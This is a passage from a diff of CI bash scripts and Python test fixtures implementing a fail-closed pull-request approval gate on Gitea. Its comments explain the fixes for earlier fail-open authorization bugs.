# Bash word-splitting on $EXPR splits on spaces, so "AND" appears as a
|
||||
# token. We skip it explicitly.
|
||||
declare -A TEAM_ID
|
||||
_all_teams=""
|
||||
for _raw_clause in $EXPR; do
|
||||
# Strip parens and split on comma.
|
||||
_clause=${_raw_clause//[()]/}
|
||||
for _t in $(echo "$_clause" | tr ',' '\n'); do
|
||||
_t=$(echo "$_t" | tr -d '[:space:]')
|
||||
[ -z "$_t" ] && continue
|
||||
# Skip AND / OR operator tokens (bash word-split produced them from
|
||||
# spaces in the expression string).
|
||||
[ "$_t" = "AND" ] || [ "$_t" = "OR" ] && continue
|
||||
# Skip if already in set.
|
||||
case " $_all_teams " in
|
||||
*" $_t "*) ;; # already present
|
||||
*) _all_teams="${_all_teams} $_t " ;;
|
||||
esac
|
||||
done
|
||||
done
|
||||
|
||||
for _t in $_all_teams; do
|
||||
_t=$(echo "$_t" | tr -d ' ')
|
||||
[ -z "$_t" ] && continue
|
||||
_id=$(jq -r --arg t "$_t" '.[] | select(.name==$t) | .id' <"$ORG_TEAMS_FILE" | head -1)
|
||||
if [ -z "$_id" ] || [ "$_id" = "null" ]; then
|
||||
# "??" suffix marks teams that don't exist yet (tier:medium qa/security).
|
||||
# Treat as permanently failing clause; clear error message guides ops.
|
||||
if [[ "$_t" == *"???" ]]; then
|
||||
debug "team \"$_t\" not found (expected — pending team creation per internal#189)"
|
||||
continue
|
||||
fi
|
||||
_visible=$(jq -r '.[]?.name? // empty' <"$ORG_TEAMS_FILE" 2>/dev/null | tr '\n' ' ')
|
||||
echo "::error::Team \"$_t\" referenced in tier $TIER expression but not found in org $OWNER. Teams visible: $_visible"
|
||||
exit 1
|
||||
fi
|
||||
TEAM_ID[$_t]="$_id"
|
||||
debug "team-id: $_t → $_id"
|
||||
done
|
||||
|
||||
# 5. Read approving reviewers. set +e disables set -e temporarily so that curl
|
||||
# failures (e.g. empty/invalid token → HTTP 401) do not abort the script before
|
||||
# set -e is restored immediately after.
|
||||
set +e
|
||||
REVIEWS=$(curl -sS -H "$AUTH" "${API}/repos/${OWNER}/${NAME}/pulls/${PR_NUMBER}/reviews")
|
||||
_REVIEWS_EXIT=$?
|
||||
set -e
|
||||
if [ $_REVIEWS_EXIT -ne 0 ] || [ -z "$REVIEWS" ]; then
|
||||
echo "::error::Failed to fetch reviews (curl exit=$_REVIEWS_EXIT) — token may be invalid or unreachable."
|
||||
exit 1
|
||||
fi
|
||||
APPROVERS=$(echo "$REVIEWS" | jq -r --arg head_sha "$HEAD_SHA" '[.[] | select(.state=="APPROVED" and .commit_id == $head_sha) | .user.login] | unique | .[]') || true
|
||||
if [ -z "$APPROVERS" ]; then
|
||||
echo "::error::No approving reviews on this PR. Set SOP_DEBUG=1 and re-run for diagnostics."
|
||||
exit 1
|
||||
fi
|
||||
debug "approvers: $(echo "$APPROVERS" | tr '\n' ' ')"
|
||||
|
||||
# 6. For each approver: skip self-review; probe team membership by id.
|
||||
# Build $APPROVER_TEAMS[<user>]=space-surrounded team names (e.g. " managers ").
|
||||
# Pre/post spaces ensure case patterns *${_t}* match even when the name
|
||||
# is the first or last entry (bash case *word* needs delimiters on both sides).
|
||||
#
|
||||
# FAIL-CLOSED AUTHORIZATION (security: SOP tier gate is an AUTHORIZATION gate).
|
||||
#
|
||||
# This used to fall back to /orgs/{org}/members/{user} whenever every team
|
||||
# probe failed and credit any org member as a member of EVERY queried team.
|
||||
# That was a privilege-escalation: org membership is NOT team membership, so
|
||||
# a 403/visibility/token-scope gap on the team probes silently promoted a
|
||||
# plain org member to satisfy tier:high (ceo). An inability-to-verify became
|
||||
# an authorization GRANT. The fallback is REMOVED — org membership must never
|
||||
# satisfy a team-gated tier.
|
||||
#
|
||||
# A team-membership probe has exactly three meaningful outcomes:
|
||||
# 200 / 204 → the user IS a member of that team (credit it)
|
||||
# 404 → the user is definitively NOT a member (no credit, verified)
|
||||
# anything else (403 / 401 / 5xx / curl failure / non-numeric)
|
||||
# → membership CANNOT be read (cannot-verify)
|
||||
#
|
||||
# Per the dev-sop fail-closed rule (inability-to-verify = failure, never a
|
||||
# pass — and here, never an authorization grant), a cannot-verify outcome on
|
||||
# ANY probe is a HARD infra failure: we publish a loud cannot-verify error and
|
||||
# exit non-zero. We do NOT proceed to evaluate the tier expression on a partial
|
||||
# / unverifiable membership picture, because doing so could let an unverifiable
|
||||
# approver's clause silently fail-or-pass on incomplete data. Fix the token
|
||||
# scope (read:organization) or the runner network — not the gate.
|
||||
declare -A APPROVER_TEAMS
|
||||
_verify_failed="" # accumulates "<user>:<team>(HTTP <code>)" for probes we could not read
|
||||
for U in $APPROVERS; do
|
||||
[ "$U" = "$PR_AUTHOR" ] && debug "skip self-review by $U" && continue
|
||||
for T in "${!TEAM_ID[@]}"; do
|
||||
ID="${TEAM_ID[$T]}"
|
||||
set +e
|
||||
CODE=$(curl -sS -o /dev/null -w '%{http_code}' -H "$AUTH" \
|
||||
"${API}/teams/${ID}/members/${U}")
|
||||
_curl_exit=$?
|
||||
set -e
|
||||
debug "probe: $U in team $T (id=$ID) → HTTP $CODE (curl exit=$_curl_exit)"
|
||||
if [ "$_curl_exit" -ne 0 ]; then
|
||||
# curl itself failed (DNS, connection refused, timeout) — unreachable.
|
||||
_verify_failed="${_verify_failed}${_verify_failed:+, }${U}:${T}(curl exit ${_curl_exit})"
|
||||
continue
|
||||
fi
|
||||
case "$CODE" in
|
||||
200|204)
|
||||
APPROVER_TEAMS[$U]="${APPROVER_TEAMS[$U]:- } ${APPROVER_TEAMS[$U]:+ }$T "
|
||||
debug "$U qualifies for team $T"
|
||||
;;
|
||||
404)
|
||||
# Definitively not a member of this team — a verified negative.
|
||||
debug "$U is NOT a member of team $T (verified 404)"
|
||||
;;
|
||||
*)
|
||||
# 403/401/5xx/etc — membership is unreadable. Do NOT treat as "not a
|
||||
# member" and do NOT fall back to org membership. This is cannot-verify.
|
||||
_verify_failed="${_verify_failed}${_verify_failed:+, }${U}:${T}(HTTP ${CODE})"
|
||||
;;
|
||||
esac
|
||||
done
|
||||
done
|
||||
|
||||
# Fail-closed: if ANY membership probe could not be read, we cannot make an
|
||||
# authorization decision. Publish a loud cannot-verify / infra-failed status
|
||||
# and exit non-zero. Never grant the tier on unverifiable membership.
|
||||
if [ -n "$_verify_failed" ]; then
|
||||
echo "::error::sop-tier-check CANNOT VERIFY team membership — gate FAILS CLOSED."
|
||||
echo "::error::Unreadable membership probe(s): ${_verify_failed}"
|
||||
echo "::error::A team-membership probe returned 403/401/5xx (or curl failed). The SOP tier gate is an authorization gate; an inability to verify team membership is treated as a FAILURE, never a pass. Org membership is NOT team membership and is never credited as a fallback."
|
||||
echo "::error::Fix: ensure GITEA_TOKEN (SOP_TIER_CHECK_TOKEN) has read:organization scope and the Gitea API is reachable from the runner, then re-run. Do NOT relax this gate."
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# 7. Evaluate the tier expression.
|
||||
#
|
||||
# legacy OR-gate: use the simplified loop from before internal#189.
|
||||
if [ -n "${LEGACY_ELIGIBLE:-}" ]; then
|
||||
OK=""
|
||||
for _u in "${!APPROVER_TEAMS[@]}"; do
|
||||
for _t2 in $LEGACY_ELIGIBLE; do
|
||||
case "${APPROVER_TEAMS[$_u]}" in
|
||||
*${_t2}*)
|
||||
echo "::notice::approver $_u is in team $_t2 (eligible for $TIER)"
|
||||
OK="yes"
|
||||
break
|
||||
;;
|
||||
esac
|
||||
done
|
||||
[ -n "$OK" ] && break
|
||||
done
|
||||
if [ -z "$OK" ]; then
|
||||
echo "::error::Tier $TIER requires approval from a non-author member of {$LEGACY_ELIGIBLE}. Set SOP_DEBUG=1 to see per-probe HTTP codes."
|
||||
exit 1
|
||||
fi
|
||||
echo "::notice::sop-tier-check passed: $TIER (legacy OR-gate)"
|
||||
exit 0
|
||||
fi
|
||||
|
||||
# AND-gate: evaluate the expression clause by clause.
|
||||
# _passed_clauses and _failed_clauses accumulate for the status description.
|
||||
_passed_clauses=""
|
||||
_failed_clauses=""
|
||||
|
||||
for _raw_clause in $EXPR; do
|
||||
# Normalise: strip parens, replace commas with spaces so bash word-split
|
||||
# can iterate the OR-set members. The previous form
|
||||
# _clause=$(echo ... | tr ',' '\n' | tr -d '[:space:]' | grep -v '^$')
|
||||
# collapsed every member into one concatenated token because
|
||||
# `tr -d '[:space:]'` strips the very newlines that just separated them
|
||||
# ("engineers,managers,ceo" -> "engineersmanagersceo"), so the OR-clause
|
||||
# only ever evaluated as a single nonsense team name and never matched
|
||||
# APPROVER_TEAMS. Fixed in #229: leave the comma-separated members as
|
||||
# space-separated tokens for `for _t in $_clause`.
|
||||
_no_parens=${_raw_clause//[()]/}
|
||||
_clause=${_no_parens//,/ }
|
||||
_clause_passed="no"
|
||||
_clause_names=""
|
||||
for _t in $_clause; do
|
||||
# Append (don't overwrite) team name to the human-readable accumulator.
|
||||
# The previous form `_clause_names="${_clause_names:+, }${_t}"`
|
||||
# rewrote the variable on every iteration, so the FAIL message only
|
||||
# ever showed the LAST team. Fixed: prepend prior value before the
|
||||
# comma-separator, then append the new team name.
|
||||
_clause_names="${_clause_names}${_clause_names:+, }${_t}"
|
||||
# Skip teams not yet in Gitea (qa??? / security??? placeholders).
|
||||
[[ "$_t" == *"???" ]] && debug "clause \"$_t\": skipped (team pending creation)" && continue
|
||||
[ -z "${TEAM_ID[$_t]:-}" ] && debug "clause \"$_t\": no ID resolved, skipping" && continue
|
||||
for _u in "${!APPROVER_TEAMS[@]}"; do
|
||||
# Note: APPROVER_TEAMS values are space-surrounded (e.g. " managers ").
|
||||
# Pattern *${_t}* matches team name anywhere in the space-padded string.
|
||||
case "${APPROVER_TEAMS[$_u]}" in
|
||||
*${_t}*)
|
||||
_clause_passed="yes"
|
||||
debug "clause \"$_t\": satisfied by $_u"
|
||||
break
|
||||
;;
|
||||
esac
|
||||
done
|
||||
done
|
||||
|
||||
# Label for display: strip "???" from pending teams.
|
||||
_label=$(echo "$_raw_clause" | tr -d '()' | tr ',' '/' | tr -d '[:space:]' | sed 's/???//g')
|
||||
|
||||
if [ "$_clause_passed" = "yes" ]; then
|
||||
# Append (don't overwrite) — same accumulator bug as _clause_names above.
|
||||
_passed_clauses="${_passed_clauses}${_passed_clauses:+, }$_label"
|
||||
echo "::notice::clause [$_label]: PASS — satisfied by approving reviewer(s)"
|
||||
else
|
||||
_failed_clauses="${_failed_clauses}${_failed_clauses:+, }$_label"
|
||||
echo "::error::clause [$_label]: FAIL — no approving reviewer belongs to any of these teams (${_clause_names}). Set SOP_DEBUG=1 to see per-team probe results."
|
||||
fi
|
||||
done
|
||||
|
||||
if [ -n "$_failed_clauses" ]; then
|
||||
echo ""
|
||||
echo "::error::sop-tier-check FAILED for $TIER."
|
||||
echo " Passed :${_passed_clauses}"
|
||||
echo " Missing:${_failed_clauses}"
|
||||
echo " All clauses must be satisfied. Each missing team needs an APPROVED review from one of its members."
|
||||
exit 1
|
||||
fi
|
||||
|
||||
echo "::notice::sop-tier-check PASSED: $TIER — all required clauses satisfied [${_passed_clauses}]"
|
||||
@@ -1,199 +0,0 @@
|
||||
#!/usr/bin/env bash
|
||||
# sop-tier-refire — re-evaluate sop-tier-check and POST status to PR head SHA.
|
||||
#
|
||||
# Invoked from `.gitea/workflows/sop-tier-refire.yml` when a repo
|
||||
# MEMBER/OWNER/COLLABORATOR comments `/refire-tier-check` on a PR.
|
||||
#
|
||||
# Behavior:
|
||||
#
|
||||
# 1. Resolve PR head SHA + author from PR_NUMBER.
|
||||
# 2. Rate-limit: if the sop-tier-check context has been POSTed in the
|
||||
# last 30 seconds, skip (prevents comment-spam status thrash).
|
||||
# 3. Invoke `.gitea/scripts/sop-tier-check.sh` with the same env the
|
||||
# canonical workflow provides. This is DRY: we re-use the exact AND-
|
||||
# composition gate logic, not a watered-down approving-count check.
|
||||
# 4. POST the resulting status (success on exit 0, failure on non-zero)
|
||||
# to `/repos/.../statuses/{HEAD_SHA}` with context
|
||||
# "sop-tier-check / tier-check (pull_request)" — the same context name
|
||||
# branch protection requires.
|
||||
#
|
||||
# Required env (set by sop-tier-refire.yml):
|
||||
# GITEA_TOKEN — org-level SOP_TIER_CHECK_TOKEN (read:org/user/issue/repo)
|
||||
# GITEA_HOST — e.g. git.moleculesai.app
|
||||
# REPO — owner/name
|
||||
# PR_NUMBER — PR number from issue_comment payload
|
||||
# COMMENT_AUTHOR — login of the commenter (logged for audit)
|
||||
#
|
||||
# Optional:
|
||||
# SOP_DEBUG=1 — verbose per-API-call diagnostics
|
||||
# SOP_REFIRE_RATE_LIMIT_SEC — override the 30s rate-limit (default 30)
|
||||
# SOP_REFIRE_DISABLE_RATE_LIMIT=1 — for tests; skips the rate-limit check
|
||||
|
||||
set -euo pipefail
|
||||
|
||||
debug() {
|
||||
if [ "${SOP_DEBUG:-}" = "1" ]; then
|
||||
echo " [debug] $*" >&2
|
||||
fi
|
||||
}
|
||||
|
||||
: "${GITEA_TOKEN:?GITEA_TOKEN required}"
|
||||
: "${GITEA_HOST:?GITEA_HOST required}"
|
||||
: "${REPO:?REPO required (owner/name)}"
|
||||
: "${PR_NUMBER:?PR_NUMBER required}"
|
||||
: "${COMMENT_AUTHOR:=unknown}"
|
||||
|
||||
OWNER="${REPO%%/*}"
|
||||
NAME="${REPO##*/}"
|
||||
API="https://${GITEA_HOST}/api/v1"
|
||||
AUTH="Authorization: token ${GITEA_TOKEN}"
|
||||
CONTEXT="sop-tier-check / tier-check (pull_request)"
|
||||
RATE_LIMIT_SEC="${SOP_REFIRE_RATE_LIMIT_SEC:-30}"
|
||||
|
||||
echo "::notice::sop-tier-refire start: repo=$OWNER/$NAME pr=$PR_NUMBER commenter=$COMMENT_AUTHOR"
|
||||
|
||||
# 1. Fetch PR details — need head.sha and user.login.
|
||||
PR_FILE=$(mktemp)
|
||||
trap 'rm -f "$PR_FILE"' EXIT
|
||||
PR_HTTP=$(curl -sS -o "$PR_FILE" -w '%{http_code}' -H "$AUTH" \
|
||||
"${API}/repos/${OWNER}/${NAME}/pulls/${PR_NUMBER}")
|
||||
if [ "$PR_HTTP" != "200" ]; then
|
||||
echo "::error::GET /pulls/$PR_NUMBER returned HTTP $PR_HTTP (body $(head -c 200 "$PR_FILE"))"
|
||||
exit 1
|
||||
fi
|
||||
HEAD_SHA=$(jq -r '.head.sha' <"$PR_FILE")
|
||||
PR_AUTHOR=$(jq -r '.user.login' <"$PR_FILE")
|
||||
PR_STATE=$(jq -r '.state' <"$PR_FILE")
|
||||
if [ -z "$HEAD_SHA" ] || [ "$HEAD_SHA" = "null" ]; then
|
||||
echo "::error::Could not resolve head.sha from PR #$PR_NUMBER response"
|
||||
exit 1
|
||||
fi
|
||||
debug "head_sha=$HEAD_SHA pr_author=$PR_AUTHOR state=$PR_STATE"
|
||||
|
||||
if [ "$PR_STATE" != "open" ]; then
|
||||
echo "::notice::PR #$PR_NUMBER state is $PR_STATE; refire is a no-op on closed PRs."
|
||||
exit 0
|
||||
fi
|
||||
|
||||
# 2. Rate-limit: skip if our context was updated in the last $RATE_LIMIT_SEC.
|
||||
# Gitea statuses endpoint returns latest first; we check the most recent
|
||||
# entry for our context name.
|
||||
if [ "${SOP_REFIRE_DISABLE_RATE_LIMIT:-}" != "1" ]; then
|
||||
STATUSES_FILE=$(mktemp)
|
||||
trap 'rm -f "$PR_FILE" "$STATUSES_FILE"' EXIT
|
||||
ST_HTTP=$(curl -sS -o "$STATUSES_FILE" -w '%{http_code}' -H "$AUTH" \
|
||||
"${API}/repos/${OWNER}/${NAME}/statuses/${HEAD_SHA}?limit=50&sort=newest")
|
||||
debug "statuses-list HTTP=$ST_HTTP"
|
||||
if [ "$ST_HTTP" = "200" ]; then
|
||||
LAST_UPDATED=$(jq -r --arg c "$CONTEXT" \
|
||||
'[.[] | select(.context == $c)] | first | .updated_at // ""' \
|
||||
<"$STATUSES_FILE")
|
||||
if [ -n "$LAST_UPDATED" ] && [ "$LAST_UPDATED" != "null" ]; then
|
||||
# Parse RFC3339 → epoch. Use python -c for portability (date(1) -d
|
||||
# differs between BSD/GNU; the Gitea runner is Ubuntu so GNU date
|
||||
# works, but we keep python for future container variance).
|
||||
LAST_EPOCH=$(python3 -c "import sys,datetime;print(int(datetime.datetime.fromisoformat(sys.argv[1].replace('Z','+00:00')).timestamp()))" "$LAST_UPDATED" 2>/dev/null || echo "0")
|
||||
NOW_EPOCH=$(date -u +%s)
|
||||
AGE=$((NOW_EPOCH - LAST_EPOCH))
|
||||
debug "last status update: $LAST_UPDATED ($AGE seconds ago)"
|
||||
if [ "$AGE" -lt "$RATE_LIMIT_SEC" ] && [ "$AGE" -ge 0 ]; then
|
||||
echo "::notice::sop-tier-refire rate-limited — last status update was ${AGE}s ago (<${RATE_LIMIT_SEC}s window). Try again shortly."
|
||||
exit 0
|
||||
fi
|
||||
fi
|
||||
fi
|
||||
fi
|
||||
|
||||
# 3. Invoke sop-tier-check.sh with the env it expects.
|
||||
#
|
||||
# FAIL-CLOSED contract (was fail-open — fixed 2026-06-05,
|
||||
# fix/core-ci-fail-closed). The previous shape was:
|
||||
# bash "$SCRIPT" || true
|
||||
# TIER_EXIT=0 # <-- hardcoded success
|
||||
# which discarded the real verdict and ALWAYS POSTed
|
||||
# `state=success` for the REQUIRED context
|
||||
# `sop-tier-check / tier-check (pull_request)`. That meant ANY
|
||||
# collaborator could comment `/refire-tier-check` to forcibly green
|
||||
# the SOP-6 approval gate on the PR head SHA — a fail-open AND a
|
||||
# privilege bypass of branch protection. The canonical
|
||||
# pull_request_target workflow's conclusion publishes the same
|
||||
# context honestly (red on a real violation); the refire MUST mirror
|
||||
# THAT honesty, not a discarded exit code.
|
||||
#
|
||||
# We now capture the script's real exit code under `set +e` and POST
|
||||
# success ONLY when it actually exited 0. sop-tier-check.sh itself
|
||||
# fails closed on infra faults (no SOP_FAIL_OPEN in this refire env),
|
||||
# so a bad token / unreachable API / missing jq → non-zero → we POST
|
||||
# `state=failure`, never a false green.
|
||||
#
|
||||
# SOP_REFIRE_TIER_CHECK_SCRIPT env var lets tests substitute a mock —
|
||||
# sop-tier-check.sh uses bash 4+ associative arrays which trigger a known
|
||||
# bash 3.2 parser bug (`tier: unbound variable` from declare -A with
|
||||
# `set -u`). Linux Gitea runners ship bash 4/5 so production is fine;
|
||||
# the override exists so the bash 3.2 dev box can still exercise the
|
||||
# refire glue logic end-to-end.
|
||||
SCRIPT="${SOP_REFIRE_TIER_CHECK_SCRIPT:-$(dirname "$0")/sop-tier-check.sh}"
|
||||
if [ ! -f "$SCRIPT" ]; then
|
||||
echo "::error::sop-tier-check.sh not found at $SCRIPT — refire requires the canonical script"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Re-invoke. Pipe stdout/stderr through so the runner log shows the
|
||||
# tier-check decision inline. Capture the REAL exit code (set +e so a
|
||||
# non-zero verdict doesn't abort this script under set -e) — the POST
|
||||
# below keys off it, so a failed tier-check posts state=failure.
|
||||
set +e
|
||||
GITEA_TOKEN="$GITEA_TOKEN" \
|
||||
GITEA_HOST="$GITEA_HOST" \
|
||||
REPO="$REPO" \
|
||||
PR_NUMBER="$PR_NUMBER" \
|
||||
PR_AUTHOR="$PR_AUTHOR" \
|
||||
SOP_DEBUG="${SOP_DEBUG:-0}" \
|
||||
SOP_LEGACY_CHECK="${SOP_LEGACY_CHECK:-0}" \
|
||||
bash "$SCRIPT"
|
||||
TIER_EXIT=$?
|
||||
set -e
|
||||
debug "sop-tier-check.sh exit=$TIER_EXIT"
|
||||
|
||||
# 4. POST the resulting status.
|
||||
if [ "$TIER_EXIT" -eq 0 ]; then
|
||||
STATE="success"
|
||||
DESCRIPTION="Refired via /refire-tier-check by $COMMENT_AUTHOR"
|
||||
else
|
||||
STATE="failure"
|
||||
DESCRIPTION="Refired via /refire-tier-check; tier-check failed (see workflow log)"
|
||||
fi
|
||||
|
||||
# Status target_url points at the runner log so a curious reviewer can
|
||||
# follow it back. SERVER_URL + RUN_ID + JOB_ID isn't trivially constructible
|
||||
# from the bash env on Gitea 1.22.6, so we point at the PR itself.
|
||||
TARGET_URL="https://${GITEA_HOST}/${OWNER}/${NAME}/pulls/${PR_NUMBER}"
|
||||
|
||||
POST_BODY=$(jq -nc \
|
||||
--arg state "$STATE" \
|
||||
--arg context "$CONTEXT" \
|
||||
--arg description "$DESCRIPTION" \
|
||||
--arg target_url "$TARGET_URL" \
|
||||
'{state:$state, context:$context, description:$description, target_url:$target_url}')
|
||||
|
||||
POST_FILE=$(mktemp)
|
||||
trap 'rm -f "$PR_FILE" "${STATUSES_FILE:-}" "$POST_FILE"' EXIT
|
||||
POST_HTTP=$(curl -sS -o "$POST_FILE" -w '%{http_code}' \
|
||||
-X POST -H "$AUTH" -H "Content-Type: application/json" \
|
||||
-d "$POST_BODY" \
|
||||
"${API}/repos/${OWNER}/${NAME}/statuses/${HEAD_SHA}")
|
||||
if [ "$POST_HTTP" != "200" ] && [ "$POST_HTTP" != "201" ]; then
|
||||
echo "::error::POST /statuses/$HEAD_SHA returned HTTP $POST_HTTP (body $(head -c 200 "$POST_FILE"))"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
echo "::notice::sop-tier-refire posted state=$STATE for context=\"$CONTEXT\" on sha=$HEAD_SHA"
|
||||
# Exit 0: the refire JOB succeeded — it re-evaluated the gate and posted
|
||||
# an HONEST status. The gate VERDICT is carried by the POSTed status
|
||||
# ($STATE), which is what branch protection reads; a failing tier-check
|
||||
# posts state=failure (red on the PR), so there is no fail-open. We do
|
||||
# NOT also exit non-zero on a failing verdict — that would double-signal
|
||||
# the same failure as both a red status AND a red refire job. The
|
||||
# fail-open that mattered (TIER_EXIT hardcoded to 0 → always state=success)
|
||||
# is fixed above by capturing the real exit code.
|
||||
exit 0
|
||||
@@ -1,28 +0,0 @@
|
||||
#!/usr/bin/env bash
|
||||
# Mock sop-tier-check.sh for sop-tier-refire tests.
|
||||
#
|
||||
# Exits 0 ("PASS") if $MOCK_TIER_RESULT == "pass", else exits 1.
|
||||
# This lets the refire tests cover the success + failure status-POST
|
||||
# paths without invoking the real sop-tier-check.sh (which uses bash 4+
|
||||
# associative arrays — known parser bug on macOS bash 3.2 dev box).
|
||||
|
||||
set -euo pipefail
|
||||
|
||||
case "${MOCK_TIER_RESULT:-pass}" in
|
||||
pass)
|
||||
echo "::notice::mock tier-check: PASS"
|
||||
exit 0
|
||||
;;
|
||||
fail_no_label)
|
||||
echo "::error::mock tier-check: no tier label"
|
||||
exit 1
|
||||
;;
|
||||
fail_no_approvals)
|
||||
echo "::error::mock tier-check: no approving reviews"
|
||||
exit 1
|
||||
;;
|
||||
*)
|
||||
echo "::error::mock tier-check: unknown MOCK_TIER_RESULT=${MOCK_TIER_RESULT:-}"
|
||||
exit 2
|
||||
;;
|
||||
esac
|
||||
@@ -1,208 +0,0 @@
|
||||
#!/usr/bin/env python3
|
||||
"""Stub Gitea API for sop-tier-refire test scenarios.
|
||||
|
||||
Reads $FIXTURE_STATE_DIR/scenario to decide what to return for each
|
||||
endpoint the sop-tier-refire.sh + sop-tier-check.sh scripts call.
|
||||
Captures every POST to /statuses/{sha} into posted_statuses.jsonl so
|
||||
the test can assert what the script tried to write.
|
||||
|
||||
Scenarios:
|
||||
T1_success — tier:low + APPROVED by engineer → tier-check passes
|
||||
T2_no_tier_label — no tier label → tier-check exits 1 before POST
|
||||
T3_no_approvals — tier:low but zero approving reviews → exits 1
|
||||
T4_closed — PR state=closed → refire is a no-op
|
||||
T5_rate_limited — last status update 5 seconds ago → skip
|
||||
|
||||
Usage:
|
||||
FIXTURE_STATE_DIR=/tmp/x python3 _refire_fixture.py 8080
|
||||
"""
|
||||
|
||||
import datetime
|
||||
import http.server
|
||||
import json
|
||||
import os
|
||||
import re
|
||||
import sys
|
||||
import urllib.parse
|
||||
|
||||
|
||||
STATE_DIR = os.environ["FIXTURE_STATE_DIR"]
|
||||
|
||||
|
||||
def scenario() -> str:
|
||||
p = os.path.join(STATE_DIR, "scenario")
|
||||
if not os.path.isfile(p):
|
||||
return "T1_success"
|
||||
with open(p, encoding="utf-8") as f:
|
||||
return f.read().strip()
|
||||
|
||||
|
||||
def now_iso() -> str:
|
||||
return datetime.datetime.now(datetime.timezone.utc).isoformat()
|
||||
|
||||
|
||||
def append_post(body: dict) -> None:
|
||||
with open(os.path.join(STATE_DIR, "posted_statuses.jsonl"), "a") as f:
|
||||
f.write(json.dumps(body) + "\n")
|
||||
|
||||
|
||||
def pr_payload() -> dict:
|
||||
sc = scenario()
|
||||
state = "closed" if sc == "T4_closed" else "open"
|
||||
return {
|
||||
"number": 999,
|
||||
"state": state,
|
||||
"head": {"sha": "deadbeef0000111122223333444455556666"},
|
||||
"user": {"login": "feature-author"},
|
||||
}
|
||||
|
||||
|
||||
def labels_payload() -> list:
|
||||
sc = scenario()
|
||||
if sc == "T2_no_tier_label":
|
||||
return [{"name": "bug"}]
|
||||
# All other scenarios use tier:low
|
||||
return [{"name": "tier:low"}, {"name": "ci"}]
|
||||
|
||||
|
||||
def reviews_payload() -> list:
|
||||
sc = scenario()
|
||||
if sc == "T3_no_approvals":
|
||||
return []
|
||||
# All other scenarios have one APPROVED review by an engineer
|
||||
return [
|
||||
{
|
||||
"state": "APPROVED",
|
||||
"user": {"login": "reviewer-engineer"},
|
||||
}
|
||||
]
|
||||
|
||||
|
||||
def teams_payload() -> list:
|
||||
# Mirror the real molecule-ai org teams referenced in TIER_EXPR
|
||||
return [
|
||||
{"id": 5, "name": "ceo"},
|
||||
{"id": 2, "name": "engineers"},
|
||||
{"id": 6, "name": "managers"},
|
||||
]
|
||||
|
||||
|
||||
def statuses_payload() -> list:
|
||||
sc = scenario()
|
||||
if sc == "T5_rate_limited":
|
||||
recent = (
|
||||
datetime.datetime.now(datetime.timezone.utc)
|
||||
- datetime.timedelta(seconds=5)
|
||||
).isoformat()
|
||||
return [
|
||||
{
|
||||
"context": "sop-tier-check / tier-check (pull_request)",
|
||||
"state": "failure",
|
||||
"updated_at": recent,
|
||||
}
|
||||
]
|
||||
return []
|
||||
|
||||
|
||||
def user_payload() -> dict:
|
||||
# Mirrors the WHOAMI probe in sop-tier-check.sh
|
||||
return {"login": "sop-tier-bot-fixture"}
|
||||
|
||||
|
||||
class Handler(http.server.BaseHTTPRequestHandler):
|
||||
# Quiet — keep stdout for explicit logs only.
|
||||
def log_message(self, *args, **kwargs): # noqa: D401
|
||||
pass
|
||||
|
||||
def _json(self, code: int, body) -> None:
|
||||
payload = json.dumps(body).encode()
|
||||
self.send_response(code)
|
||||
self.send_header("Content-Type", "application/json")
|
||||
self.send_header("Content-Length", str(len(payload)))
|
||||
self.end_headers()
|
||||
self.wfile.write(payload)
|
||||
|
||||
def _empty(self, code: int) -> None:
|
||||
self.send_response(code)
|
||||
self.send_header("Content-Length", "0")
|
||||
self.end_headers()
|
||||
|
||||
def do_GET(self): # noqa: N802
|
||||
u = urllib.parse.urlparse(self.path)
|
||||
path = u.path
|
||||
|
||||
if path == "/_ping":
|
||||
return self._json(200, {"ok": True})
|
||||
if path == "/api/v1/user":
|
||||
return self._json(200, user_payload())
|
||||
|
||||
# /api/v1/repos/{owner}/{name}/pulls/{n}
|
||||
m = re.match(r"^/api/v1/repos/[^/]+/[^/]+/pulls/(\d+)$", path)
|
||||
if m:
|
||||
return self._json(200, pr_payload())
|
||||
|
||||
# /api/v1/repos/{owner}/{name}/issues/{n}/labels
|
||||
if re.match(r"^/api/v1/repos/[^/]+/[^/]+/issues/\d+/labels$", path):
|
||||
return self._json(200, labels_payload())
|
||||
|
||||
# /api/v1/repos/{owner}/{name}/pulls/{n}/reviews
|
||||
if re.match(r"^/api/v1/repos/[^/]+/[^/]+/pulls/\d+/reviews$", path):
|
||||
return self._json(200, reviews_payload())
|
||||
|
||||
# /api/v1/orgs/{owner}/teams
|
||||
if re.match(r"^/api/v1/orgs/[^/]+/teams$", path):
|
||||
return self._json(200, teams_payload())
|
||||
|
||||
# /api/v1/teams/{id}/members/{login} → 204 if user is an engineer
|
||||
m = re.match(r"^/api/v1/teams/(\d+)/members/([^/]+)$", path)
|
||||
if m:
|
||||
team_id, login = m.group(1), m.group(2)
|
||||
# In our fixture reviewer-engineer ∈ engineers (id=2)
|
||||
if team_id == "2" and login == "reviewer-engineer":
|
||||
return self._empty(204)
|
||||
return self._empty(404)
|
||||
|
||||
# /api/v1/orgs/{owner}/members/{login} — fallback path used when
|
||||
# team-member probes all 403. We don't need it for these tests.
|
||||
if re.match(r"^/api/v1/orgs/[^/]+/members/[^/]+$", path):
|
||||
return self._empty(404)
|
||||
|
||||
# /api/v1/repos/{owner}/{name}/statuses/{sha}
|
||||
if re.match(r"^/api/v1/repos/[^/]+/[^/]+/statuses/[^/]+$", path):
|
||||
return self._json(200, statuses_payload())
|
||||
|
||||
return self._json(404, {"path": path, "msg": "fixture: no route"})
|
||||
|
||||
def do_POST(self): # noqa: N802
|
||||
u = urllib.parse.urlparse(self.path)
|
||||
path = u.path
|
||||
length = int(self.headers.get("Content-Length") or 0)
|
||||
raw = self.rfile.read(length) if length else b""
|
||||
try:
|
||||
body = json.loads(raw) if raw else {}
|
||||
except Exception:
|
||||
body = {"_raw": raw.decode(errors="replace")}
|
||||
|
||||
if re.match(r"^/api/v1/repos/[^/]+/[^/]+/statuses/[^/]+$", path):
|
||||
append_post(body)
|
||||
# Echo back something status-shaped — script only checks HTTP code.
|
||||
return self._json(
|
||||
201,
|
||||
{
|
||||
"context": body.get("context"),
|
||||
"state": body.get("state"),
|
||||
"created_at": now_iso(),
|
||||
},
|
||||
)
|
||||
|
||||
return self._json(404, {"path": path, "msg": "fixture: no route"})
|
||||
|
||||
|
||||
def main():
|
||||
